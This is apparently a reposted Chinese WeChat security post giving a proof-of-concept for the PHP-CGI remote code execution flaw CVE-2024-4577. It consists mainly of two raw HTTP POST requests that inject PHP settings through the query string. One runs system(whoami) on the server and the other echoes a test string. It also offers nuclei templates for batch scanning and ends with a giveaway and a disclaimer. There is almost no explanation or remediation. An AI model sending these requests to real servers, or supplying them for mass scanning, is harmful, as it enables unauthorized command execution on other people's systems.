1. 手工复现
验证poc:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host: xxx.xxx.xxx
REDIRECT-STATUS:1
Content-type: text/html; charset=UTF-8
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
<?php echo system(whoami);?>
无危害验证poc:
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host: xxx.xxx.xxx
REDIRECT-STATUS:1
Content-type: text/html; charset=UTF-8
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
<?php echo "fkalis";?>
2. nuclei批量化验证
回复关键字【CVE-2024-4577】获取批量化yaml文件
3. 端午抽奖
祝各位师傅端午节快乐,技术越来越牛逼!!
原文始发于微信公众号(fkalis):PHP 最新RCE POC (nuclei文件) (内含抽奖)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论